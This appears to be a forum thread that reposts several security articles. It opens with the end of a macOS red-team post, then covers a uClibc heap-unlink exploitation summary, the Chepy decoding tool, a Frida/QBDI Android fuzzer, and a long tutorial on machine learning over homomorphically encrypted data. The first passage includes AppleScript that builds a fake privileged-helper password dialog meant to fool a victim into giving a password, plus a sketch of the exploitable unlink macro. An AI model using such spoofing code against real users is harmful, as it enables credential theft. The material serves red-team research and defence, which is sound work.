Application icons typically live in the application bundle's Resources folder and have a .icns extension. Since we have the application's path from above, it should be a simple matter to grab the icon. Before we go on, we'll need to add a couple of "helper handlers" for what's coming next and to keep our code tidy. Also, at the top of our script, we define some constants. For now, we'll leave these as plain text, but we can obscure them in various ways in our final version. Notice the defaultIconStr constant, which provides our default. If you want to see what this looks like, try calling it with the following command:

-- let's get the user name from the Foundation framework:
set userName to current application's NSUserName()
display dialog hlprName & my makeChanges & return & my privString & userName & my allowThis default answer "" with title parentName default button "OK" with icon my software_update_icon as «class furl» with hidden answer

Hmm, not bad, but not great either. It would look so much better with the app's actual icon. The icon name is defined in the app's Info.plist. Let's add another handler to grab it:

Here's our code for grabbing the icon tidied up:

And here are a few examples of what our script produces now:

Conclusion

Our authorization requests are now looking reasonably convincing. They contain an app name and a process name, both of which will check out as legitimate if the user decides to look into them. We also have a proper password field and we call the user out by name in the message text. And it's worth reminding ourselves at this point that all this is achieved without triggering any of the traps set in Mojave and Catalina for cracking down on AppleScript, without knowing anything in advance about what is on the victim's computer and, most importantly, without requiring any privileges at all.

Indeed, it's privileges that we're after, and in the next part we'll continue by looking at the code to capture the password entered by the user as well as how to launch our spoofing script at an appropriate time, when the user is actually using one of the apps we found on their system. We'll see how we can adapt the same techniques to target other privileged apps that use kexts and LaunchDaemons rather than Privileged Helper tools. As a bonus, we'll also look into advanced AppleScript techniques for building even better, more convincing dialog boxes with two text fields. If you enjoyed this post, please subscribe to the blog and we will let you know when the next part is live!

Disclaimer

To avoid any doubt, all the applications mentioned in this post are perfectly legitimate, and to my knowledge none of the apps contain any vulnerabilities related to the content of this post. The techniques described above are entirely out of the control of individual developers.
Sursa: https://www.sentinelone.com/blog/macos-red-team-spoofing-privileged-helpers-and-others-to-gain-root/
  10. uClibc Unlink Heap Exploitation

November 26, 2019

In this paper, I introduce the reader to a heap metadata corruption attack against the latest version of uClibc, an allocator used in embedded systems. The unlink attack on heaps was first introduced by Solar Designer in the year 2000 and was the first generic heap exploitation technique made public. In the unlink technique, an attacker corrupts the prev and next pointers of a free chunk. In a subsequent malloc that recycles this chunk, the chunk is unlinked from its freelist via pointer manipulations. This inadvertently allows an attacker to craft a write-what-where primitive and write what they want where they want in memory. This attack is historical, but it also exists today in uClibc.

uClibc Unlink Heap Exploitation.PDF

Sursa: https://blog.infosectcbr.com.au/2019/11/uclibc-unlink-heap-exploitation.html
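For reference, the core of the classic unlink operation that this class of attack abuses looks roughly like the dlmalloc-style macro below (a simplified sketch using the textbook chunk layout, not uClibc's exact source):

/* remove free chunk P from its doubly linked freelist */
#define unlink(P, BK, FD) {                                         \
    FD = P->fd;                                                     \
    BK = P->bk;                                                     \
    FD->bk = BK; /* with attacker-controlled fd/bk, these two    */ \
    BK->fd = FD; /* stores become a write-what-where primitive   */ \
}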
  11. Chepy
Chepy is a python library with a handy CLI that aims to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put behind Chepy to make it compatible with the various functionalities that CyberChef offers, all in a pure Pythonic manner. There are some key advantages and disadvantages that Chepy has over CyberChef. The CyberChef concept of stacking different modules is kept alive in Chepy. There is still a long way to go for Chepy, as it does not offer every single ability of CyberChef.

Docs

Refer to the docs for full usage information.

Example

For all usage and examples, see the docs. Chepy has a stacking mechanism similar to CyberChef. For example, this recipe in CyberChef is equivalent to:

from chepy import Chepy

file_path = "/tmp/demo/encoding"

print(
    Chepy(file_path)
    .load_file()
    .reverse()
    .rot_13()
    .base64_decode()
    .base32_decode()
    .hexdump_to_str()
    .o
)

Installation

Chepy can be installed in a few ways.

Pypi:

pip3 install chepy

Git:

git clone https://github.com/securisec/chepy.git
cd chepy
pip3 install -e .
# I use -e here so that if I update later with git pull, I don't have to install it again (unless dependencies have changed)

Pipenv:

git clone https://github.com/securisec/chepy.git
cd chepy
pipenv install

Docker:

docker run --rm -ti -v $PWD:/data securisec/chepy "some string" [somefile, "another string"]

Chepy vs CyberChef

Advantages

Chepy is pure python with a supporting and accessible python api
Chepy has a CLI
Chepy CLI has full autocompletion.
Extendable via plugins
Chepy has the concept of recipes which makes sharing much simpler.
Infinitely scalable as it can leverage the full Python library.
Chepy can interface with the full CyberChef web app to a certain degree. It is easy to move from Chepy to CyberChef if need be.
The Chepy python library is significantly faster than the CyberChef Node library.
Works with HTTP/S requests without CORS issues.

Disadvantages

Chepy is not a web app (at least for now).
Chepy does not offer every single thing that CyberChef does
Chepy does not have the magic method (at the moment)

Sursa: https://github.com/securisec/chepy
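As a quick illustration of the stacking concept on a plain string rather than a file (using only methods shown in the README above; the input string and expected output are my own toy example, so treat the exact behavior as an assumption rather than documented output):

from chepy import Chepy

# rot13-decode a short string, mirroring a one-step CyberChef recipe;
# .o retrieves the current state of the stack
print(Chepy("fRPerG_zrffntr").rot_13().o)  # expected: "sECreT_message"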
  12. Frida/QBDI Android API Fuzzer

This experimental fuzzer is meant to be used for API in-memory fuzzing on Android. The design is heavily inspired by and based on AFL/AFL++. At the moment the mutator is quite simple, just AFL's havoc stage, and the seed selection is simply FIFO (no favored paths, no trimming, no extra features). Obviously these features are planned; if you want to contribute by adding them, PRs are welcome. At the moment I have tested only the two examples under tests/; this is a very WIP project.

How to

This fuzzer is known to work in the Android Emulator (tested on x86_64) but should in theory work on any rooted x86 Android device.

Firstly, download the Android x86_64 build of QBDI and extract the archive in a subdirectory of this project named QBDI. Then install Frida on your host with pip3 install frida.

Make sure to have the root shell and SELinux disabled on your virtual device:

host$ adb root
host$ adb shell setenforce 0

Download the Android x86_64 frida-server from the repo release page and copy it onto the device under /data/local/tmp (use adb push). Copy libQBDI.so to /data/local/tmp as well. Start a shell and run the frida-server:

device# cd /data/local/tmp
device# ./frida-server-12.7.22-android-x86_64

Now install the test app tests/app-debug.apk using drag & drop into the emulator window. Then, open the app.

Compile the agent script with frida-compile:

host$ frida-compile -x index.js -o frida-fuzz-agent.js

Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command:

host$ python3 fuzz.py output_folder/ com.example.ndktest1

Both interesting testcases and crashes are saved into output_folder. Enjoy.

Sursa: https://github.com/andreafioraldi/frida-qbdi-fuzzer
  13. Machine Learning on Encrypted Data Without Decrypting It

22 Nov 2019 | Keno Fischer

Note: This post discusses cutting edge cryptographic techniques. It is intended to give a view into research at Julia Computing. Do not use any examples in this blog post for production applications. Always consult a professional cryptographer before using cryptography.

TL;DR: click here to go directly to the package that implements the magic and here for the code that we'll be talking about in this blog post.

Introduction

Suppose you have just developed a spiffy new machine learning model (using Flux.jl of course) and now want to start deploying it for your users. How do you go about doing that? Probably the simplest thing would be to just ship your model to your users and let them run it locally on their data. However, there are a number of problems with this approach:

ML models are large and the user's device may not have enough storage or computation to actually run the model.
ML models are often updated frequently and you may not want to send the large model across the network that often.
Developing ML models takes a lot of time and computational resources, which you may want to recover by charging your users for making use of your model.

The solution that usually comes next is to expose the model as an API on the cloud. These machine learning-as-a-service offerings have sprung up en masse over the past few years, with every major cloud platform offering such services to the enterprising developer. The dilemma for potential users of such products is obvious: user data is now processed on some remote server that may not necessarily be trustworthy. This has clear ethical and legal ramifications that limit the areas where such solutions can be effective. In regulated industries, such as medicine or finance in particular, sending patient or financial data to third parties for processing is often a no-go.

Can we do better? As it turns out we can! Recent breakthroughs in cryptography have made it practical to perform computation on data without ever decrypting it. In our example, the user would send encrypted data (e.g. images) to the cloud API, which would run the machine learning model and then return the encrypted answer. Nowhere was the user data decrypted, and in particular the cloud provider does not have access to the original image, nor is it able to decrypt the prediction it computed. How is this possible? Let's find out by building a machine learning service for handwriting recognition of encrypted images (from the MNIST dataset).

HE generally

The ability to compute on encrypted data is generally referred to as "secure computation" and is a fairly large area of research, with many different cryptographic approaches and techniques for a plethora of different application scenarios. For our example, we will be focusing on a technique known as "homomorphic encryption". In a homomorphic encryption system, we generally have the following operations available:

pub_key, eval_key, priv_key = keygen()
encrypted = encrypt(pub_key, plaintext)
decrypted = decrypt(priv_key, encrypted)
encrypted′ = eval(eval_key, f, encrypted)

The first three are fairly straightforward and should be familiar to anyone who has used any sort of asymmetric cryptography before (as you did when you connected to this blog post via TLS). The last operation is where the magic is. It evaluates some function f on the encryption and returns another encrypted value corresponding to the result of evaluating f on the encrypted value.
It is this property that gives homomorphic computation its name. Evaluation commutes with the encryption operation:

f(decrypt(priv_key, encrypted)) == decrypt(priv_key, eval(eval_key, f, encrypted))

(Equivalently, it is possible to evaluate arbitrary homomorphisms f on the encrypted value.) Which functions f are supported depends on the cryptographic scheme and its supported operations. If only one f is supported (e.g. f = +), we call an encryption scheme "partially homomorphic". If f can be any complete set of gates out of which we can build arbitrary circuits, we call the computation "somewhat homomorphic" if the size of the circuit is limited, or "fully homomorphic" if the size of the circuit is unlimited. It is often possible to turn "somewhat" into "fully" homomorphic encryption through a technique known as bootstrapping, though that is beyond the scope of the current blog post. Fully homomorphic encryption is a fairly recent discovery, with the first viable (though not practical) scheme published by Craig Gentry in 2009. There are several more recent (and practical) FHE schemes. More importantly, there are software packages that implement them efficiently. The two most commonly used ones are probably Microsoft SEAL and PALISADE. In addition, I recently open sourced a pure Julia implementation of these algorithms. For our purposes we will be using the CKKS scheme as implemented in the latter.

CKKS High Level

CKKS (named after Cheon-Kim-Kim-Song, the authors of the 2016 paper that proposed it) is a homomorphic encryption scheme that allows homomorphic evaluation of the following primitive operations:

Elementwise addition of length n vectors of complex numbers
Elementwise multiplication of length n complex vectors
Rotation (in the circshift sense) of elements in the vector
Complex conjugation of vector elements

The parameter n here depends on the desired security and precision and is generally relatively high. For our example it will be 4096 (higher numbers are more secure, but also more expensive, scaling as roughly n log n). Additionally, computations using CKKS are noisy. As a result, computational results are only approximate and care must be taken to ensure that results are evaluated with sufficient precision to not affect the correctness of a result.

That said, these restrictions are not all that unusual to developers of machine learning packages. Special purpose accelerators like GPUs also generally operate on vectors of numbers. Likewise, for many developers floating point numbers can sometimes feel noisy due to the effects of algorithm selection, multithreading etc. (I want to emphasize that there is a crucial difference here in that floating point arithmetic is inherently deterministic, even if it sometimes doesn't appear that way due to the complexity of the implementation, while the CKKS primitives really are noisy; but perhaps this allows users to appreciate that noisiness is not as scary as it might at first appear).
With that in mind, let's see how we can perform these operations in Julia (note: these are highly insecure parameter choices; the purpose of these operations is to illustrate usage of the library at the REPL):

julia> using ToyFHE

# Let's play with 8 element vectors
julia> N = 8;

# Choose some parameters - we'll talk about it later
julia> ℛ = NegacyclicRing(2N, (40, 40, 40))
ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1)

# We'll use CKKS
julia> params = CKKSParams(ℛ)
CKKS parameters

# We need to pick a scaling factor for our numbers - again we'll talk about that later
julia> Tscale = FixedRational{2^40}
FixedRational{1099511627776,T} where T

# Let's start with a plain Vector of zeros
julia> plain = CKKSEncoding{Tscale}(zero(ℛ))
8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7:
 0.0 + 0.0im
 0.0 + 0.0im
 0.0 + 0.0im
 0.0 + 0.0im
 0.0 + 0.0im
 0.0 + 0.0im
 0.0 + 0.0im
 0.0 + 0.0im

# Ok, we're ready to get started, but first we'll need some keys
julia> kp = keygen(params)
CKKS key pair

julia> kp.priv
CKKS private key

julia> kp.pub
CKKS public key

# Alright, let's encrypt some things:
julia> foreach(i->plain[i] = i+1, 0:7); plain
8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7:
 1.0 + 0.0im
 2.0 + 0.0im
 3.0 + 0.0im
 4.0 + 0.0im
 5.0 + 0.0im
 6.0 + 0.0im
 7.0 + 0.0im
 8.0 + 0.0im

julia> c = encrypt(kp.pub, plain)
CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1099511627776,T} where T})

# And decrypt it again
julia> decrypt(kp.priv, c)
8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7:
 0.9999999999995506 - 2.7335193113350057e-16im
 1.9999999999989408 - 3.885780586188048e-16im
 3.000000000000205 + 1.6772825551165524e-16im
 4.000000000000538 - 3.885780586188048e-16im
 4.999999999998865 + 8.382500573679615e-17im
 6.000000000000185 + 4.996003610813204e-16im
 7.000000000001043 - 2.0024593503998215e-16im
 8.000000000000673 + 4.996003610813204e-16im

# Note that we had some noise. Let's go through all the primitive operations we'll need:
julia> decrypt(kp.priv, c+c)
8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7:
 1.9999999999991012 - 5.467038622670011e-16im
 3.9999999999978817 - 7.771561172376096e-16im
 6.00000000000041 + 3.354565110233105e-16im
 8.000000000001076 - 7.771561172376096e-16im
 9.99999999999773 + 1.676500114735923e-16im
 12.00000000000037 + 9.992007221626409e-16im
 14.000000000002085 - 4.004918700799643e-16im
 16.000000000001346 + 9.992007221626409e-16im

julia> csq = c*c
CKKS ciphertext (length 3, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T})

julia> decrypt(kp.priv, csq)
8-element CKKSEncoding{FixedRational{1208925819614629174706176,T} where T} with indices 0:7:
 0.9999999999991012 - 2.350516767363621e-15im
 3.9999999999957616 - 5.773159728050814e-15im
 9.000000000001226 - 2.534464540987068e-15im
 16.000000000004306 - 2.220446049250313e-15im
 24.99999999998865 + 2.0903753311370056e-15im
 36.00000000000222 + 4.884981308350689e-15im
 49.000000000014595 + 1.0182491378134327e-15im
 64.00000000001077 + 4.884981308350689e-15im

That was easy! The eagle-eyed reader may have noticed that csq looks a bit different from the previous ciphertext. In particular, it is a "length 3" ciphertext and the scale is much larger. What these are and what they do is a bit too complicated for this point in the blog post, but suffice it to say, we want to get these back down before we do further computation, or we'll run out of "space" in the ciphertext.
Luckily, there is a way to do this for each of the two aspects that grew:

# To get back down to length 2, we need to `keyswitch` (aka
# relinearize), which requires an evaluation key. Generating
# this requires the private key. In a real application we would
# have generated this up front and sent it along with the encrypted
# data, but since we have the private key, we can just do it now.
julia> ek = keygen(EvalMultKey, kp.priv)
CKKS multiplication key

julia> csq_length2 = keyswitch(ek, csq)
CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T})

# Getting the scale back down is done using modswitching.
julia> csq_smaller = modswitch(csq_length2)
CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1.099511626783e12,T} where T})

# And it still decrypts correctly (though note we've lost some precision)
julia> decrypt(kp.priv, csq_smaller)
8-element CKKSEncoding{FixedRational{1.099511626783e12,T} where T} with indices 0:7:
 0.9999999999802469 - 5.005163520332181e-11im
 3.9999999999957723 - 1.0468514951188039e-11im
 8.999999999998249 - 4.7588542623100616e-12im
 16.000000000023014 - 1.0413447889166631e-11im
 24.999999999955193 - 6.187833723406491e-12im
 36.000000000002345 + 1.860733715346631e-13im
 49.00000000001647 - 1.442396043149794e-12im
 63.999999999988695 - 1.0722489563648028e-10im

Additionally, modswitching (short for modulus switching) reduces the size of the ciphertext modulus, so we can't just keep doing this indefinitely. (In the terminology from above, we're using a SHE scheme):

julia> ℛ # Remember the ring we initially created
ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1)

julia> ToyFHE.ring(csq_smaller) # It shrunk!
ℤ₁₂₀₈₉₂₅₈₂₀₁₄₄₅₉₃₇₇₉₃₃₁₅₅₃/(x¹⁶ + 1)

There's one last operation we'll need: rotations. Like keyswitching above, this requires an evaluation key (also called a galois key):

julia> gk = keygen(GaloisKey, kp.priv; steps=2)
CKKS galois key (element 25)

julia> decrypt(kp.priv, circshift(c, gk))
8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7:
 7.000000000001042 + 5.68459112632516e-16im
 8.000000000000673 + 5.551115123125783e-17im
 0.999999999999551 - 2.308655353580721e-16im
 1.9999999999989408 + 2.7755575615628914e-16im
 3.000000000000205 - 6.009767921608429e-16im
 4.000000000000538 + 5.551115123125783e-17im
 4.999999999998865 + 4.133860996136768e-17im
 6.000000000000185 - 1.6653345369377348e-16im

# And let's compare to doing the same on the plaintext
julia> circshift(plain, 2)
8-element OffsetArray(::Array{Complex{Float64},1}, 0:7) with eltype Complex{Float64} with indices 0:7:
 7.0 + 0.0im
 8.0 + 0.0im
 1.0 + 0.0im
 2.0 + 0.0im
 3.0 + 0.0im
 4.0 + 0.0im
 5.0 + 0.0im
 6.0 + 0.0im

Alright, we've covered the basic usage of the HE library. Before we get started thinking about how to perform neural network inference using these primitives, let's look at and train the neural network we'll be using.

The machine learning model

If you're not familiar with machine learning, or the Flux.jl machine learning library, I'd recommend a quick detour to the Flux.jl documentation or our free Introduction to Machine Learning course on JuliaAcademy, since we'll only be discussing the changes for running the model on encrypted data. Our starting point is the convolutional neural network example in the Flux model zoo. We'll keep the training loop, data preparation, etc. the same and just tweak the model slightly.
The model we'll use is:

function reshape_and_vcat(x)
    let y=reshape(x, 64, 4, size(x, 4))
        vcat((y[:,i,:] for i=axes(y,2))...)
    end
end

model = Chain(
    # First convolution, operating upon a 28x28 image
    Conv((7, 7), 1=>4, stride=(3,3), x->x.^2),
    reshape_and_vcat,
    Dense(256, 64, x->x.^2),
    Dense(64, 10),
)

This is essentially the same model as the one used in the paper "Secure Outsourced Matrix Computation and Application to Neural Networks", which uses the same cryptographic scheme for the same demo, with two differences: 1) they also encrypt the model, which we neglect here for simplicity, and 2) we have bias vectors after every layer (which is what Flux will do by default), which I'm not sure was the case for the model evaluated in the paper. Perhaps because of 2), the test set accuracy of our model is slightly higher (98.6% vs 98.1%), but this may of course also just come down to hyperparameter differences.

An unusual feature (for those coming from a machine learning background) are the x.^2 activation functions. More common choices here would be something like tanh or relu or something fancier than that. However, while those functions (relu in particular) are cheap to evaluate on plaintext values, they would be quite expensive to evaluate encryptedly (we'd basically evaluate a polynomial approximation). Luckily x.^2 works fine for our purposes.

The rest of the training loop is basically the same. The softmax was removed from the model in favor of a logitcrossentropy loss function (though of course we could have kept it and just evaluated the softmax after decryption on the client). The full code to train this model is on GitHub and completes in a few minutes on any recent GPU.

Performing the operations efficiently

Alright, now that we know what we need to do, let's take stock of what operations we need to be able to do:

Convolutions
Elementwise Squaring
Matrix Multiply

Squaring is trivial, we already saw that above, so let's tackle the other two in order. Throughout we'll be assuming that we're working with a batch size of 64 (you may note that the model parameters and batch size were strategically chosen to take good advantage of a 4096 element vector, which is what we get from realistic parameter choices).

Convolution

Let us recall how convolution works. We take some window (in our case 7x7) of the original input array and for each element in the window multiply by an element of the convolution mask. Then we move the window over some amount (in our case, the stride is 3, so we move over by 3 elements) and repeat the process (with the same convolution mask). This process is illustrated in the following animation (source) for a 3x3 convolution with stride (2, 2) (the blue array is the input, the green array the output):

Additionally, we have convolutions into 4 different "channels" (all this means is that we repeat the convolution 3 more times with different convolution masks).

Alright, so now that we know what we're doing, let's figure out how to do it. We're in luck in that the convolution is the first thing in our model. As a result, we can do some preprocessing on the client before encrypting the data (without needing the model weights) to save us some work. In particular, we'll do the following:

Precompute each convolution window (i.e. 7x7 extraction from the original images), giving us 64 7x7 matrices per input image (note for 7x7 windows with stride 3 there are 8x8 convolution windows to evaluate per 28x28 input image)
Collect the same position in each window into one vector, i.e.
we'll have a 64-element vector for each image, or a 64x64 element vector for a batch of 64 (i.e. a total of 49 64x64 matrices)
Encrypt that

The convolution then simply becomes scalar multiplication of the whole matrix with the appropriate mask element, and by summing all 49 elements later, we get the result of the convolution. An implementation of this strategy (on the plaintext) may look like:

function public_preprocess(batch)
    ka = OffsetArray(0:7, 0:7)
    # Create feature extracted matrix
    I = [[batch[i′*3 .+ (1:7), j′*3 .+ (1:7), 1, k] for i′=ka, j′=ka] for k = 1:64]
    # Reshape into the ciphertext
    Iᵢⱼ = [[I[k][l...][i,j] for k=1:64, l=product(ka, ka)] for i=1:7, j=1:7]
end

Iᵢⱼ = public_preprocess(batch)

# Evaluate the convolution
weights = model.layers[1].weight
conv_weights = reverse(reverse(weights, dims=1), dims=2)
conved = [sum(Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4]
conved = map(((x,b),)->x .+ b, zip(conved, model.layers[1].bias))

which (modulo a reordering of the dimensions) gives the same answer as model.layers[1](batch), but using only operations we can also perform homomorphically. Adding the encryption operations, we have:

Iᵢⱼ = public_preprocess(batch)
C_Iᵢⱼ = map(Iᵢⱼ) do Iij
    plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params)))
    plain .= OffsetArray(vec(Iij), 0:(N÷2-1))
    encrypt(kp, plain)
end

weights = model.layers[1].weight
conv_weights = reverse(reverse(weights, dims=1), dims=2)
conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4]
conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias))
conved1 = map(ToyFHE.modswitch, conved2)

Note that a keyswitch isn't required because the weights are public, so we didn't expand the length of the ciphertext.

Matrix multiply

Moving on to matrix multiply, we take advantage of the fact that we can rotate elements in the vector to effect a re-ordering of the multiplication indices. In particular, consider a row-major ordering of matrix elements in the vector. Then, if we shift the vector by a multiple of the row size, we get the effect of rotating the columns, which is a sufficient primitive for implementing matrix multiply (of square matrices at least). Let's try it:

function matmul_square_reordered(weights, x)
    sum(1:size(weights, 1)) do k
        # We rotate the columns of the LHS and take the diagonal
        weight_diag = diag(circshift(weights, (0,(k-1))))
        # We rotate the rows of the RHS
        x_rotated = circshift(x, (k-1,0))
        # We do an elementwise, broadcast multiply
        weight_diag .* x_rotated
    end
end

function matmul_reorderd(weights, x)
    sum(partition(1:256, 64)) do range
        matmul_square_reordered(weights[:, range], x[range, :])
    end
end

fc1_weights = model.layers[3].W
x = rand(Float64, 256, 64)
@assert (fc1_weights*x) ≈ matmul_reorderd(fc1_weights, x)

Of course, for general matrix multiply we may want something fancier, but it'll do for now.

Making it nicer

At this point, we've managed to get everything together and indeed it works.
For reference, here it is in all its glory (omitting setup for parameter selection and the like):

ek = keygen(EvalMultKey, kp.priv)
gk = keygen(GaloisKey, kp.priv; steps=64)

Iᵢⱼ = public_preprocess(batch)
C_Iᵢⱼ = map(Iᵢⱼ) do Iij
    plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params)))
    plain .= OffsetArray(vec(Iij), 0:(N÷2-1))
    encrypt(kp, plain)
end

weights = model.layers[1].weight
conv_weights = reverse(reverse(weights, dims=1), dims=2)
conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4]
conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias))
conved1 = map(ToyFHE.modswitch, conved2)

Csqed1 = map(x->x*x, conved1)
Csqed1 = map(x->keyswitch(ek, x), Csqed1)
Csqed1 = map(ToyFHE.modswitch, Csqed1)

function encrypted_matmul(gk, weights, x::ToyFHE.CipherText)
    result = repeat(diag(weights), inner=64).*x
    rotated = x
    for k = 2:64
        rotated = ToyFHE.rotate(gk, rotated)
        result += repeat(diag(circshift(weights, (0,(k-1)))), inner=64) .* rotated
    end
    result
end

fq1_weights = model.layers[3].W
Cfq1 = sum(enumerate(partition(1:256, 64))) do (i,range)
    encrypted_matmul(gk, fq1_weights[:, range], Csqed1[i])
end

Cfq1 = Cfq1 .+ OffsetArray(repeat(model.layers[3].b, inner=64), 0:4095)
Cfq1 = modswitch(Cfq1)

Csqed2 = Cfq1*Cfq1
Csqed2 = keyswitch(ek, Csqed2)
Csqed2 = modswitch(Csqed2)

function naive_rectangular_matmul(gk, weights, x)
    @assert size(weights, 1) < size(weights, 2)
    weights = vcat(weights, zeros(eltype(weights), size(weights, 2)-size(weights, 1), size(weights, 2)))
    encrypted_matmul(gk, weights, x)
end

fq2_weights = model.layers[4].W
Cresult = naive_rectangular_matmul(gk, fq2_weights, Csqed2)
Cresult = Cresult .+ OffsetArray(repeat(vcat(model.layers[4].b, zeros(54)), inner=64), 0:4095)

Not very pretty to look at, but hopefully if you have made it this far in the blog post, you should be able to understand each step in the sequence. Now, let's turn our attention to thinking about some abstractions that would make all this easier. We're now leaving the realm of cryptography and machine learning and arriving at programming language design, so let's take advantage of the fact that Julia allows powerful abstractions and go through the exercise of building some. For example, we could encapsulate the whole convolution extraction process as a custom array type:

using BlockArrays

"""
    ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4}

Represents an `nxmx1xb` array of images, but rearranged into a series of convolution windows. Evaluating a convolution compatible with `Dims` on this array is achievable through a sequence of scalar multiplications and sums on the underlying storage.
""" struct ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4} # sx*sy matrix of b*(dx*dy) matrices of extracted elements # where (sx, sy) = kernel_size(Dims) # (dx, dy) = output_size(DenseConvDims(...)) cdims::Dims x::Matrix{Storage} function ExplodedConvArray{T, Dims, Storage}(cdims::Dims, storage::Matrix{Storage}) where {T, Dims, Storage} @assert all(==(size(storage[1])), size.(storage)) new{T, Dims, Storage}(cdims, storage) end end Base.size(ex::ExplodedConvArray) = (NNlib.input_size(ex.cdims)..., 1, size(ex.x[1], 1)) function ExplodedConvArray{T}(cdims, batch::AbstractArray{T, 4}) where {T} x, y = NNlib.output_size(cdims) kx, ky = NNlib.kernel_size(cdims) stridex, stridey = NNlib.stride(cdims) kax = OffsetArray(0:x-1, 0:x-1) kay = OffsetArray(0:x-1, 0:x-1) I = [[batch[i′*stridex .+ (1:kx), j′*stridey .+ (1:ky), 1, k] for i′=kax, j′=kay] for k = 1:size(batch, 4)] Iᵢⱼ = [[I[k][l...][i,j] for k=1:size(batch, 4), l=product(kax, kay)] for (i,j) in product(1:kx, 1:ky)] ExplodedConvArray{T, typeof(cdims), eltype(Iᵢⱼ)}(cdims, Iᵢⱼ) end function NNlib.conv(x::ExplodedConvArray{<:Any, Dims}, weights::AbstractArray{<:Any, 4}, cdims::Dims) where {Dims<:ConvDims} blocks = reshape([ Base.ReshapedArray(sum(x.x[i,j]*weights[i,j,1,channel] for i=1:7, j=1:7), (NNlib.output_size(cdims)...,1,size(x, 4)), ()) for channel = 1:4 ],(1,1,4,1)) BlockArrays._BlockArray(blocks, BlockArrays.BlockSizes([8], [8], [1,1,1,1], [64])) end Note that here we made use BlockArrays back to represent a 8x8x4x64 array as 4 8x8x1x64 arrays as in the original code. Ok, so now we already have a much nicer representation of the first step, at least on unencrypted arrays: julia> cdims = DenseConvDims(batch, model.layers[1].weight; stride=(3,3), padding=(0,0,0,0), dilation=(1,1)) DenseConvDims: (28, 28, 1) * (7, 7) -> (8, 8, 4), stride: (3, 3) pad: (0, 0, 0, 0), dil: (1, 1), flip: false julia> a = ExplodedConvArray{eltype(batch)}(cdims, batch); julia> model(a) 10×64 Array{Float32,2}: [snip] How do we bring this into the encrypted world? Well, we need to do two things: We want to encrypt a struct (ExplodedConvArray) in such a way that each that we get a ciphertext for each field. Then, operations on this encrypted struct work by looking up what the function would have done on the original struct and simply doing the same homomorphically. We want to intercept certain operations to be done differently in the encrypted context. Luckily, Julia, provides an abstraction that lets us a do both: A compiler plugin-in using the Cassette.jl mechanism. How this works and how to use it is a bit of a complicated story, so I will omit it from this blog, post, but briefly, you can define a Context (say Encrypted and then define rules for how operations under this context work). 
For example, the second requirement might be written as:

# Define Matrix multiplication between an array and an encrypted block array
function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{<:BlockArray{T, 2}}) where {T}
    sum(a*b for (i,range) in enumerate(partition(1:size(a, 2), size(b.blocks[1], 1))))
end

# Define Matrix multiplication between an array and an encrypted array
function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{Array{T, 2}}) where {T}
    result = repeat(diag(a), inner=size(a, 1)).*x
    rotated = b
    for k = 2:size(a, 2)
        rotated = ToyFHE.rotate(GaloisKey(*), rotated)
        result += repeat(diag(circshift(a, (0,(k-1)))), inner=size(a, 1)) .* rotated
    end
    result
end

The end result of all of this is that the user should be able to write the whole thing above with minimal manual work:

kp = keygen(ckks_params)
ek = keygen(EvalMultKey, kp.priv)
gk = keygen(GaloisKey, kp.priv; steps=64)

# Create evaluation context
ctx = Encrypted(ek, gk)

# Do public preprocessing
batch = ExplodedConvArray{eltype(batch)}(cdims, batch);

# Run on encrypted data under the encryption context
Cresult = ctx(model)(encrypt(kp.pub, batch))

# Decrypt the answer
decrypt(kp, Cresult)

Of course, even that may not be optimal. The parameters of the cryptosystem (e.g. the ring ℛ, when to modswitch, keyswitch, etc) represent a tradeoff between precision of the answer, security and performance, and depend strongly on the code being run. In general, one would want the compiler to analyze the code it's about to run encrypted, suggest parameters for a given security level and desired precision, and then generate the code with minimal manual work by the user.

Conclusion

Achieving the dream of automatically executing arbitrary computations securely is a tall order for any system, but Julia's metaprogramming capabilities and friendly syntax make it well suited as a development platform. Some attempts at this have already been made by the RAMPARTS collaboration (paper, JuliaCon talk), which compiles simple Julia code to the PALISADE FHE library. Julia Computing is collaborating with the experts behind RAMPARTS on Verona, the recently announced next generation version of that system. Only in the past year or so has the performance of homomorphic encryption systems reached the point where it is possible to actually evaluate interesting computations at speeds approaching practical usability. The floodgates are open. With new advances in algorithms, software and hardware, homomorphic encryption is sure to become a mainstream technology to protect the privacy of millions of users.

If you would like to understand more deeply how everything works, I have tried to make sure that the ToyFHE repository is readable. There is also some documentation that I'm hoping gives a somewhat approachable introduction to the cryptography involved. Of course much work remains to be done. If you are interested in this kind of work or have interesting applications, do not hesitate to get in touch.

Sursa: https://juliacomputing.com/blog/2019/11/22/encrypted-machine-learning.html
  14. Hydrabus Framework

ghecko | Oct 20

Hi Guys,

